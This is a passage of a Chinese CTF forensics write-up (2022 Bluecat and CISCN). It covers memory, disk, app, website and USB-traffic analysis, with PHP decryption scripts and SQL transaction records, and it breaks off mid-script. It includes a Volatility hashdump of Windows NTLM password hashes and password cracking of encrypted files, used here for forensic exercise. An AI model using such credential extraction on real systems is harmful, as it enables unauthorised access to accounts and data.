360x360

手机取证_2

搜索关键字,在Skype中的群组有聊天记录:

image.png

计算机取证_1

PS D:\volatility_2.6_win64_standalone> ./volatility_2.6_win64_standalone.exe -f F:\2022bluecat\1.dmp --profile=Win7SP1x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
taqi7:1000:aad3b435b51404eeaad3b435b51404ee:7f21caca5685f10d9e849cc84c340528:::
naizheng:1002:aad3b435b51404eeaad3b435b51404ee:d123b09e13b1a82277c3e3f0ca722060:::
qinai:1003:aad3b435b51404eeaad3b435b51404ee:1c333843181864a58156f3e9498fe905:::

image.png

anxinqi

计算机取证_2

利用取证大师工具集获取内存文件信息

image.png

image.png

2192

计算机分析_3

利用取证大师工具集获取bitlocker密钥文件

image.png

导出后对镜像进行解密,

image.png有两个Office文件,两个文档,其中pass.txt是密码集

先对word文档进行解密,可以采用手撕的方式,word文档密码是:688561

image.png没有其他信息,

看powerpoint文档,手撕密码:287fuweiuhfiute

image.png

计算机取证_4

加密文档采用了True_crypt加密,尝试利用取证大师工具集获取密钥文件进行解密,结果失败。

导出文件,Passware kit制作镜像

image.png

image.png

用取证大师加载新生成的文件

image.png

爆破压缩包密码:CHV@06KVAIP9YA8W5VTF.png

得到flag

image.png

程序分析_1

image.png

程序分析_2

image.png

程序分析_3

image.png

解密发现确实是服务器地址

image.png

程序分析_4

package d.a.a.c.a

1KV0@UW9L600WC60M9.jpg

进行跟踪

image.png

答案是a

网站取证_1

网站源码过一遍D盾就有

image.png

lanmaobei666

网站取证_2

数据库配置文件在

application\database.php

image.png

encrypt/encrypt.php查看一下,然后想办法输出出来:

<?php
$str = 'P3LMJ4uCbkFJ/RarywrCvA==';
$str = str_replace(array("/r/n", "/r", "/n"), "", $str);
$key = 'PanGuShi';
$iv = substr(sha1($key),0,16);
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
mcrypt_generic_init($td, "PanGuShi", $iv);
$decode = base64_decode($str);
$dencrypted = mdecrypt_generic($td, $decode);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
$dencrypted = trim($dencrypted);
echo $dencrypted;

遇到报错Call to undefined function: mcrypt_module_open()的话是PHP版本过高缺少一个dll文件,下载到php扩展目录下然后修改php.ini即可

image.png

网站取证_3

application\admin\controller目录下Channelorder.php就有

image.png

网站取证_4

对比bak.sql发现数据:

image.png

张宝 :3

王子豪 : 5

image.png

前面是收款人,后面是付款人,所以顺序就是5, 3

对4月2日至4月18日之中,符合付款顺序的记录进行提取

INSERT INTO "public"."tab_channel_order_list" VALUES (142, '943617668819', 'GG币', NULL, '2022-04-02 01:16:26', 5, 3, 'mZVymm9t');
INSERT INTO "public"."tab_channel_order_list" VALUES (144, '588047503620', 'GG币', NULL, '2022-04-02 01:47:16', 5, 3, 'lpxqlXFo');
INSERT INTO "public"."tab_channel_order_list" VALUES (150, '597613045539', 'GG币', NULL, '2022-04-02 02:32:02', 5, 3, 'l5xummto');
INSERT INTO "public"."tab_channel_order_list" VALUES (167, '368360644631', 'GG币', NULL, '2022-04-02 03:46:25', 5, 3, 'm5Zwm3Bn');
INSERT INTO "public"."tab_channel_order_list" VALUES (187, '704008760599', 'GG币', NULL, '2022-04-02 06:53:30', 5, 3, 'nJhtlGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (189, '695829830065', 'GG币', NULL, '2022-04-02 06:57:22', 5, 3, 'm5tpmGtm');
INSERT INTO "public"."tab_channel_order_list" VALUES (197, '689591506416', 'GG币', NULL, '2022-04-02 08:09:16', 5, 3, 'm5ptnGtu');
INSERT INTO "public"."tab_channel_order_list" VALUES (199, '296524099918', 'GG币', NULL, '2022-04-02 08:29:29', 5, 3, 'mZlym25r');
INSERT INTO "public"."tab_channel_order_list" VALUES (209, '202884729901', 'GG币', NULL, '2022-04-02 09:39:39', 5, 3, 'm5hpnHBu');
INSERT INTO "public"."tab_channel_order_list" VALUES (210, '955226714946', 'GG币', NULL, '2022-04-02 09:47:09', 5, 3, 'm5prlm9u');
INSERT INTO "public"."tab_channel_order_list" VALUES (227, '421623628935', 'GG币', NULL, '2022-04-02 12:33:01', 5, 3, 'nJlyl2hu');
INSERT INTO "public"."tab_channel_order_list" VALUES (245, '228102248133', 'GG币', NULL, '2022-04-02 15:05:53', 5, 3, 'lptummhs');
INSERT INTO "public"."tab_channel_order_list" VALUES (263, '279069782487', 'GG币', NULL, '2022-04-02 17:33:06', 5, 3, 'lpxrl21n');
INSERT INTO "public"."tab_channel_order_list" VALUES (317, '911539892864', 'GG币', NULL, '2022-04-03 00:44:48', 5, 3, 'mZRpnHBs');
INSERT INTO "public"."tab_channel_order_list" VALUES (358, '940690024660', 'GG币', NULL, '2022-04-03 06:12:18', 5, 3, 'mZpxm2lr');
INSERT INTO "public"."tab_channel_order_list" VALUES (371, '703759626723', 'GG币', NULL, '2022-04-03 08:02:01', 5, 3, 'm5dtmGls');
INSERT INTO "public"."tab_channel_order_list" VALUES (405, '250826052511', 'GG币', NULL, '2022-04-03 11:58:42', 5, 3, 'mpxvlnBv');
INSERT INTO "public"."tab_channel_order_list" VALUES (418, '699369204729', 'GG币', NULL, '2022-04-03 13:26:10', 5, 3, 'mJpynHBt');
INSERT INTO "public"."tab_channel_order_list" VALUES (441, '110783516494', 'GG币', NULL, '2022-04-03 17:08:54', 5, 3, 'nJZwm2lu');
INSERT INTO "public"."tab_channel_order_list" VALUES (448, '754012259548', 'GG币', NULL, '2022-04-03 17:41:43', 5, 3, 'mpdtnWxq');
INSERT INTO "public"."tab_channel_order_list" VALUES (452, '999734985528', 'GG币', NULL, '2022-04-03 18:54:29', 5, 3, 'nJdtlmpr');
INSERT INTO "public"."tab_channel_order_list" VALUES (457, '259291480194', 'GG币', NULL, '2022-04-03 20:24:01', 5, 3, 'mZtymHBm');
INSERT INTO "public"."tab_channel_order_list" VALUES (468, '672136643928', 'GG币', NULL, '2022-04-03 22:11:12', 5, 3, 'nJlslmpp');
INSERT INTO "public"."tab_channel_order_list" VALUES (486, '995091488940', 'GG币', NULL, '2022-04-04 00:49:53', 5, 3, 'l5RunW1p');
INSERT INTO "public"."tab_channel_order_list" VALUES (493, '369911062367', 'GG币', NULL, '2022-04-04 02:05:32', 5, 3, 'nJxplXFm');
INSERT INTO "public"."tab_channel_order_list" VALUES (494, '627743356329', 'GG币', NULL, '2022-04-04 02:14:49', 5, 3, 'lZdpmm1s');
INSERT INTO "public"."tab_channel_order_list" VALUES (496, '341907225040', 'GG币', NULL, '2022-04-04 02:21:29', 5, 3, 'mZZwnW9u');
INSERT INTO "public"."tab_channel_order_list" VALUES (541, '505274522158', 'GG币', NULL, '2022-04-04 09:38:59', 5, 3, 'mJVrmmhp');
INSERT INTO "public"."tab_channel_order_list" VALUES (558, '465727738353', 'GG币', NULL, '2022-04-04 11:36:57', 5, 3, 'lZZwl3Bs');
INSERT INTO "public"."tab_channel_order_list" VALUES (575, '801973338928', 'GG币', NULL, '2022-04-04 13:50:29', 5, 3, 'm5xvm2hm');
INSERT INTO "public"."tab_channel_order_list" VALUES (588, '990446771976', 'GG币', NULL, '2022-04-04 15:55:49', 5, 3, 'mpZslmpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (595, '443752577679', 'GG币', NULL, '2022-04-04 17:12:14', 5, 3, 'mZtrnGtp');
INSERT INTO "public"."tab_channel_order_list" VALUES (598, '274195438646', 'GG币', NULL, '2022-04-04 17:52:24', 5, 3, 'lp1rm21t');
INSERT INTO "public"."tab_channel_order_list" VALUES (605, '389442476686', 'GG币', NULL, '2022-04-04 18:47:30', 5, 3, 'nJxplmtp');
INSERT INTO "public"."tab_channel_order_list" VALUES (651, '840764463035', 'GG币', NULL, '2022-04-05 01:50:13', 5, 3, 'l5twlXFq');
INSERT INTO "public"."tab_channel_order_list" VALUES (667, '575571956339', 'GG币', NULL, '2022-04-05 04:36:41', 5, 3, 'lphqmm9s');
INSERT INTO "public"."tab_channel_order_list" VALUES (693, '369199269150', 'GG币', NULL, '2022-04-05 07:36:54', 5, 3, 'm51wmG1q');
INSERT INTO "public"."tab_channel_order_list" VALUES (706, '299510640482', 'GG币', NULL, '2022-04-05 09:39:18', 5, 3, 'mJlxlWto');
INSERT INTO "public"."tab_channel_order_list" VALUES (731, '660695028585', 'GG币', NULL, '2022-04-05 13:44:39', 5, 3, 'lJ1vmXFq');
INSERT INTO "public"."tab_channel_order_list" VALUES (738, '856482910335', 'GG币', NULL, '2022-04-05 14:17:50', 5, 3, 'mpVpmW5r');
INSERT INTO "public"."tab_channel_order_list" VALUES (756, '750042176098', 'GG币', NULL, '2022-04-05 17:02:30', 5, 3, 'm5lrlGpr');
INSERT INTO "public"."tab_channel_order_list" VALUES (784, '651691106346', 'GG币', NULL, '2022-04-05 23:00:37', 5, 3, 'mpxplm9u');
INSERT INTO "public"."tab_channel_order_list" VALUES (786, '255787712926', 'GG币', NULL, '2022-04-05 23:14:45', 5, 3, 'lZpxnHFn');
INSERT INTO "public"."tab_channel_order_list" VALUES (791, '135691319557', 'GG币', NULL, '2022-04-06 00:05:58', 5, 3, 'nJdymWpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (819, '788431214978', 'GG币', NULL, '2022-04-06 04:11:14', 5, 3, 'mJpum3Fo');
INSERT INTO "public"."tab_channel_order_list" VALUES (850, '851409238798', 'GG币', NULL, '2022-04-06 09:01:35', 5, 3, 'lpRrmWto');
INSERT INTO "public"."tab_channel_order_list" VALUES (873, '260951952586', 'GG币', NULL, '2022-04-06 12:48:13', 5, 3, 'lZtunXBv');
INSERT INTO "public"."tab_channel_order_list" VALUES (885, '231265027253', 'GG币', NULL, '2022-04-06 15:07:16', 5, 3, 'lpprnWtt');
INSERT INTO "public"."tab_channel_order_list" VALUES (930, '262701249039', 'GG币', NULL, '2022-04-06 21:47:06', 5, 3, 'lJdslnBr');
INSERT INTO "public"."tab_channel_order_list" VALUES (977, '184134048308', 'GG币', NULL, '2022-04-07 04:24:51', 5, 3, 'lJZrnWpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (979, '391202213852', 'GG币', NULL, '2022-04-07 04:29:53', 5, 3, 'l5Zrm21m');
INSERT INTO "public"."tab_channel_order_list" VALUES (1004, '325182412061', 'GG币', NULL, '2022-04-07 08:23:24', 5, 3, 'lJdul2hm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1009, '145997703051', 'GG币', NULL, '2022-04-07 08:52:54', 5, 3, 'mphylG9q');
INSERT INTO "public"."tab_channel_order_list" VALUES (1029, '812286624781', 'GG币', NULL, '2022-04-07 11:25:32', 5, 3, 'lZhpm2pp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1051, '932860292032', 'GG币', NULL, '2022-04-07 15:30:43', 5, 3, 'lZ1qnW1s');
INSERT INTO "public"."tab_channel_order_list" VALUES (1074, '960800718320', 'GG币', NULL, '2022-04-07 18:13:02', 5, 3, 'nJ1tlHFp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1079, '309703180719', 'GG币', NULL, '2022-04-07 18:34:31', 5, 3, 'mZxqm2tp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1080, '867260227199', 'GG币', NULL, '2022-04-07 18:43:45', 5, 3, 'mZdsm21t');
INSERT INTO "public"."tab_channel_order_list" VALUES (1088, '489129121639', 'GG币', NULL, '2022-04-07 20:38:54', 5, 3, 'mpRvlG9o');
INSERT INTO "public"."tab_channel_order_list" VALUES (1094, '640176750934', 'GG币', NULL, '2022-04-07 21:18:54', 5, 3, 'mJVqlmhv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1097, '271657786070', 'GG币', NULL, '2022-04-07 21:39:16', 5, 3, 'mJRwlHBq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1119, '895632760061', 'GG币', NULL, '2022-04-08 00:14:36', 5, 3, 'l5dtmWtt');
INSERT INTO "public"."tab_channel_order_list" VALUES (1164, '291179495316', 'GG币', NULL, '2022-04-08 07:31:35', 5, 3, 'mZdylHFt');
INSERT INTO "public"."tab_channel_order_list" VALUES (1170, '588053366224', 'GG币', NULL, '2022-04-08 07:44:05', 5, 3, 'l5RqlWxn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1171, '308892834659', 'GG币', NULL, '2022-04-08 07:50:45', 5, 3, 'mZ1um3Fs');
INSERT INTO "public"."tab_channel_order_list" VALUES (1181, '712419993689', 'GG币', NULL, '2022-04-08 08:43:06', 5, 3, 'lJ1rnWhu');
INSERT INTO "public"."tab_channel_order_list" VALUES (1185, '240497645432', 'GG币', NULL, '2022-04-08 09:19:05', 5, 3, 'm5pulWhv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1193, '519564426335', 'GG币', NULL, '2022-04-08 09:57:45', 5, 3, 'lptrnW1u');
INSERT INTO "public"."tab_channel_order_list" VALUES (1218, '178274213935', 'GG币', NULL, '2022-04-08 13:23:04', 5, 3, 'm5xynWxn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1243, '621845480580', 'GG币', NULL, '2022-04-08 16:30:05', 5, 3, 'lpRynGtr');
INSERT INTO "public"."tab_channel_order_list" VALUES (1246, '984927062919', 'GG币', NULL, '2022-04-08 17:09:06', 5, 3, 'mpxulGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1255, '508590678286', 'GG币', NULL, '2022-04-08 18:22:27', 5, 3, 'nJdslm9r');
INSERT INTO "public"."tab_channel_order_list" VALUES (1261, '165679472688', 'GG币', NULL, '2022-04-08 19:09:09', 5, 3, 'lJhslHBq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1272, '398566701812', 'GG币', NULL, '2022-04-08 22:03:28', 5, 3, 'nJpwnWhu');
INSERT INTO "public"."tab_channel_order_list" VALUES (1299, '391669188513', 'GG币', NULL, '2022-04-09 01:22:34', 5, 3, 'mptql2tv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1328, '308977433705', 'GG币', NULL, '2022-04-09 06:27:14', 5, 3, 'l51xmmlp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1347, '128173141307', 'GG币', NULL, '2022-04-09 08:52:54', 5, 3, 'mZVymXFn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1375, '315017222711', 'GG币', NULL, '2022-04-09 14:06:48', 5, 3, 'lJhqnW5q');
INSERT INTO "public"."tab_channel_order_list" VALUES (1390, '698730100843', 'GG币', NULL, '2022-04-09 16:15:03', 5, 3, 'm5ppmGpr');
INSERT INTO "public"."tab_channel_order_list" VALUES (1394, '454661923665', 'GG币', NULL, '2022-04-09 16:45:28', 5, 3, 'mZlqm21t');
INSERT INTO "public"."tab_channel_order_list" VALUES (1446, '770844458971', 'GG币', NULL, '2022-04-09 23:54:25', 5, 3, 'mpZslWxt');
INSERT INTO "public"."tab_channel_order_list" VALUES (1461, '336049994728', 'GG币', NULL, '2022-04-10 01:28:10', 5, 3, 'mJ1pnHFm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1503, '900217499326', 'GG币', NULL, '2022-04-10 08:16:00', 5, 3, 'l5drlXBp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1515, '541334504409', 'GG币', NULL, '2022-04-10 10:10:06', 5, 3, 'mJlvmW1u');
INSERT INTO "public"."tab_channel_order_list" VALUES (1520, '296235199037', 'GG币', NULL, '2022-04-10 11:06:19', 5, 3, 'mZtxlG5t');
INSERT INTO "public"."tab_channel_order_list" VALUES (1522, '961454505603', 'GG币', NULL, '2022-04-10 11:21:05', 5, 3, 'nJtsnHFn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1540, '660586887840', 'GG币', NULL, '2022-04-10 12:58:19', 5, 3, 'l5Rvm29o');
INSERT INTO "public"."tab_channel_order_list" VALUES (1542, '521373859771', 'GG币', NULL, '2022-04-10 13:02:35', 5, 3, 'm5xvlWxv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1558, '690490467926', 'GG币', NULL, '2022-04-10 15:05:50', 5, 3, 'm5Zrl2xm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1615, '915839175755', 'GG币', NULL, '2022-04-11 01:02:35', 5, 3, 'mZlwlG1u');
INSERT INTO "public"."tab_channel_order_list" VALUES (1667, '731272590033', 'GG币', NULL, '2022-04-11 08:17:29', 5, 3, 'nJpvlWtr');
INSERT INTO "public"."tab_channel_order_list" VALUES (1676, '266051494236', 'GG币', NULL, '2022-04-11 08:51:14', 5, 3, 'mJxym25s');
INSERT INTO "public"."tab_channel_order_list" VALUES (1677, '952748053664', 'GG币', NULL, '2022-04-11 08:51:59', 5, 3, 'lpVqnWxv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1721, '432188794976', 'GG币', NULL, '2022-04-11 14:00:17', 5, 3, 'mZVvl3Fq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1730, '923396563975', 'GG币', NULL, '2022-04-11 16:47:41', 5, 3, 'lZVtlW5m');
INSERT INTO "public"."tab_channel_order_list" VALUES (1731, '188214551206', 'GG币', NULL, '2022-04-11 16:48:30', 5, 3, 'lZRqlGhn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1737, '562343715793', 'GG币', NULL, '2022-04-11 17:44:21', 5, 3, 'nJxqm2hn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1788, '723775062575', 'GG币', NULL, '2022-04-11 23:59:53', 5, 3, 'nJVtl21s');
INSERT INTO "public"."tab_channel_order_list" VALUES (1814, '437640662866', 'GG币', NULL, '2022-04-12 04:52:14', 5, 3, 'lJdumWlq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1847, '261181748262', 'GG币', NULL, '2022-04-12 08:07:42', 5, 3, 'mJtxmGtp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1866, '520680592708', 'GG币', NULL, '2022-04-12 10:10:57', 5, 3, 'mZxsnHFv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1893, '846224640296', 'GG币', NULL, '2022-04-12 13:45:48', 5, 3, 'lpdtl2xn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1901, '526823225486', 'GG币', NULL, '2022-04-12 14:27:33', 5, 3, 'mphqlm5p');
INSERT INTO "public"."tab_channel_order_list" VALUES (1919, '293881600039', 'GG币', NULL, '2022-04-12 17:33:24', 5, 3, 'lJdxlGpn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1986, '252943398463', 'GG币', NULL, '2022-04-13 02:42:54', 5, 3, 'lpVvlHFu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2050, '841971039165', 'GG币', NULL, '2022-04-13 10:41:00', 5, 3, 'lJhvmHBn');
INSERT INTO "public"."tab_channel_order_list" VALUES (2051, '113568559627', 'GG币', NULL, '2022-04-13 10:46:38', 5, 3, 'l5xunGtv');
INSERT INTO "public"."tab_channel_order_list" VALUES (2059, '884517377766', 'GG币', NULL, '2022-04-13 12:12:35', 5, 3, 'lZRul2pt');
INSERT INTO "public"."tab_channel_order_list" VALUES (2065, '429478659168', 'GG币', NULL, '2022-04-13 12:47:08', 5, 3, 'mpdqnGxu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2081, '701817809209', 'GG币', NULL, '2022-04-13 15:06:14', 5, 3, 'l5Zxlmho');
INSERT INTO "public"."tab_channel_order_list" VALUES (2093, '648527268061', 'GG币', NULL, '2022-04-13 17:34:17', 5, 3, 'lJppmWhq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2118, '346397347560', 'GG币', NULL, '2022-04-13 21:20:16', 5, 3, 'nJVylWpp');
INSERT INTO "public"."tab_channel_order_list" VALUES (2121, '598070757264', 'GG币', NULL, '2022-04-13 21:49:38', 5, 3, 'm5VxnWlr');
INSERT INTO "public"."tab_channel_order_list" VALUES (2144, '385475471817', 'GG币', NULL, '2022-04-14 00:45:19', 5, 3, 'lpdsnGtq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2152, '860407002245', 'GG币', NULL, '2022-04-14 02:02:07', 5, 3, 'mZ1tnGpt');
INSERT INTO "public"."tab_channel_order_list" VALUES (2175, '876730476520', 'GG币', NULL, '2022-04-14 07:03:09', 5, 3, 'mJVqmmtq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2226, '705271590445', 'GG币', NULL, '2022-04-14 12:55:39', 5, 3, 'l5hslWhm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2260, '778005846695', 'GG币', NULL, '2022-04-14 17:39:20', 5, 3, 'lZZtl21r');
INSERT INTO "public"."tab_channel_order_list" VALUES (2265, '429472355879', 'GG币', NULL, '2022-04-14 19:00:35', 5, 3, 'nJlumGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2279, '837352974915', 'GG币', NULL, '2022-04-14 21:44:54', 5, 3, 'lJhsmW9t');
INSERT INTO "public"."tab_channel_order_list" VALUES (2304, '206040245526', 'GG币', NULL, '2022-04-15 01:40:08', 5, 3, 'lZZym25s');
INSERT INTO "public"."tab_channel_order_list" VALUES (2347, '214154454225', 'GG币', NULL, '2022-04-15 08:01:16', 5, 3, 'l5tpnHBt');
INSERT INTO "public"."tab_channel_order_list" VALUES (2353, '539433927736', 'GG币', NULL, '2022-04-15 09:22:24', 5, 3, 'nJVunG1q');
INSERT INTO "public"."tab_channel_order_list" VALUES (2371, '614328206854', 'GG币', NULL, '2022-04-15 12:43:40', 5, 3, 'mJdtlHFu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2373, '744073817220', 'GG币', NULL, '2022-04-15 12:59:32', 5, 3, 'mpVtlnFp');
INSERT INTO "public"."tab_channel_order_list" VALUES (2386, '472576318606', 'GG币', NULL, '2022-04-15 15:44:12', 5, 3, 'mplrnG1t');
INSERT INTO "public"."tab_channel_order_list" VALUES (2393, '905356397967', 'GG币', NULL, '2022-04-15 16:21:55', 5, 3, 'mJ1ylHBr');
INSERT INTO "public"."tab_channel_order_list" VALUES (2408, '202047690664', 'GG币', NULL, '2022-04-15 18:52:56', 5, 3, 'nJhynG5m');
INSERT INTO "public"."tab_channel_order_list" VALUES (2419, '660557237414', 'GG币', NULL, '2022-04-15 20:02:34', 5, 3, 'mplymG1r');
INSERT INTO "public"."tab_channel_order_list" VALUES (2518, '284536429033', 'GG币', NULL, '2022-04-16 09:06:00', 5, 3, 'lJtxlGxo');
INSERT INTO "public"."tab_channel_order_list" VALUES (2537, '846259865921', 'GG币', NULL, '2022-04-16 13:46:20', 5, 3, 'lpRxnGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2539, '914271862202', 'GG币', NULL, '2022-04-16 13:54:39', 5, 3, 'mZxwnG5s');
INSERT INTO "public"."tab_channel_order_list" VALUES (2569, '230868458507', 'GG币', NULL, '2022-04-16 18:43:11', 5, 3, 'mZptnWpn');
INSERT INTO "public"."tab_channel_order_list" VALUES (2592, '580327294210', 'GG币', NULL, '2022-04-16 22:20:02', 5, 3, 'mJZylGxq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2601, '113725129935', 'GG币', NULL, '2022-04-16 23:57:42', 5, 3, 'mZZvm3Fo');
INSERT INTO "public"."tab_channel_order_list" VALUES (2614, '125295831828', 'GG币', NULL, '2022-04-17 01:33:33', 5, 3, 'lJdxnW9t');
INSERT INTO "public"."tab_channel_order_list" VALUES (2622, '304246628524', 'GG币', NULL, '2022-04-17 02:02:29', 5, 3, 'lZtxmXFv');
INSERT INTO "public"."tab_channel_order_list" VALUES (2636, '949878301272', 'GG币', NULL, '2022-04-17 04:33:37', 5, 3, 'nJxtlXFm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2642, '236806705755', 'GG币', NULL, '2022-04-17 05:17:45', 5, 3, 'mJZumW1r');
INSERT INTO "public"."tab_channel_order_list" VALUES (2644, '219250916132', 'GG币', NULL, '2022-04-17 05:36:23', 5, 3, 'nJ1tmG1p');
INSERT INTO "public"."tab_channel_order_list" VALUES (2653, '856797267940', 'GG币', NULL, '2022-04-17 06:50:17', 5, 3, 'mplslmpu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2709, '829562956572', 'GG币', NULL, '2022-04-17 12:14:25', 5, 3, 'lJZxlG5p');
INSERT INTO "public"."tab_channel_order_list" VALUES (2751, '904086289177', 'GG币', NULL, '2022-04-17 18:58:49', 5, 3, 'nJtxmXBq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2796, '568416612736', 'GG币', NULL, '2022-04-18 00:23:41', 5, 3, 'lZdxmmtq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2817, '987519535765', 'GG币', NULL, '2022-04-18 02:35:20', 5, 3, 'lJdrlG1o');
INSERT INTO "public"."tab_channel_order_list" VALUES (2880, '657461012245', 'GG币', NULL, '2022-04-18 11:18:57', 5, 3, 'mpZtmmlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2906, '278546157230', 'GG币', NULL, '2022-04-18 13:32:32', 5, 3, 'mJVxnGpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2921, '999235838187', 'GG币', NULL, '2022-04-18 14:45:06', 5, 3, 'mJVwmWxu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2935, '861319935688', 'GG币', NULL, '2022-04-18 16:24:05', 5, 3, 'mplslWps');

最后字符串就是金额,然后利用上一题的加密算法进行解密

<?php
$data = '';
$key = 'jyzg123456';
header('Content-type:textml;charset=utf-8');
$key = md5($key);
$x = 0;
$data = base64_decode($data);
$len = mb_strlen($data);
$l = mb_strlen($key);
$char = '';
$str = '';
for ($i = 0; $i < $len; $i++) {
    if ($x == $l) {
        $x = 0;
    }
    $char .= mb_substr($key, $x, 1);
    $x++;
}
for ($i = 0; $i < $len; $i++) {
    if (ord(mb_substr($data, $i, 1)) < ord(mb_substr($char, $i, 1))) {
        $str .= chr((ord(mb_substr($data, $i, 1)) + 256) - ord(mb_substr($char, $i, 1)));
    } else {
        $str .= chr(ord(mb_substr($data, $i, 1)) - ord(mb_substr($char, $i, 1)));
    }
}
echo $str;

image.png

每天汇率不同,在sql文件里有描述:

image.png

INSERT INTO "public"."info_bargain" VALUES ('2', 'RMB', 0.04, '2022-04-02 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('3', 'RMB', 0.06, '2022-04-03 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('4', 'RMB', 0.05, '2022-04-04 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('5', 'RMB', 0.07, '2022-04-05 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('6', 'RMB', 0.10, '2022-04-06 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('7', 'RMB', 0.15, '2022-04-07 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('8', 'RMB', 0.17, '2022-04-08 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('9', 'RMB', 0.23, '2022-04-09 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('10', 'RMB', 0.22, '2022-04-10 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('11', 'RMB', 0.25, '2022-04-11 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('12', 'RMB', 0.29, '2022-04-12 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('13', 'RMB', 0.20, '2022-04-13 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('14', 'RMB', 0.28, '2022-04-14 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('15', 'RMB', 0.33, '2022-04-15 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('16', 'RMB', 0.35, '2022-04-16 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('17', 'RMB', 0.35, '2022-04-17 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('18', 'RMB', 0.37, '2022-04-18 00:00:00');

数据不多总共132条,可以直接手撕,计算公式就是解密后数量乘以当天汇率,结果为:15758353.76

CISCN-2022 | 部分WP

MISC

问卷调查

填写问卷即可。

ez_usb

筛选usb.src == "2.8.1"提取键盘流量

image.png

导出,然后处理流量包,

tshark -r test.pcapng -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt

利用脚本添加冒号:

#!/usr/bin/env python
#-*- coding: utf-8 -*-
info = '''
kali下运行:
tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt
提取流量包信息
然后通过该脚本可以过滤掉空格和其他内容,并且添加冒号
'''
print(info)

f_data  = input("请输入带处理txt文件的路径:")
shujian = int(input("鼠标流量信息请输入8,键盘流量请输入16:"))
f = open(f_data,'r')

# 整理到out.txt
with open('out.txt','w') as f_out:
    for i in f.readlines():
        s = i.strip()
        # 鼠标流量长度为8 ,键盘流量长度为16
        if len(s) == shujian:
            # 鼠标流量长度为8 ,键盘流量长度为16
            nsl = [s[j:j+2] for j in range(0,shujian,2)]
            ns = ":".join(nsl)
            f_out.write(ns)
            f_out.write('\n') 

然后对添加冒号的txt进行处理:

#!/usr/bin/env python
#-*- coding: utf-8 -*-
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i",
              "0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
              "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1",
              "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
              "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[",
              "30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/",
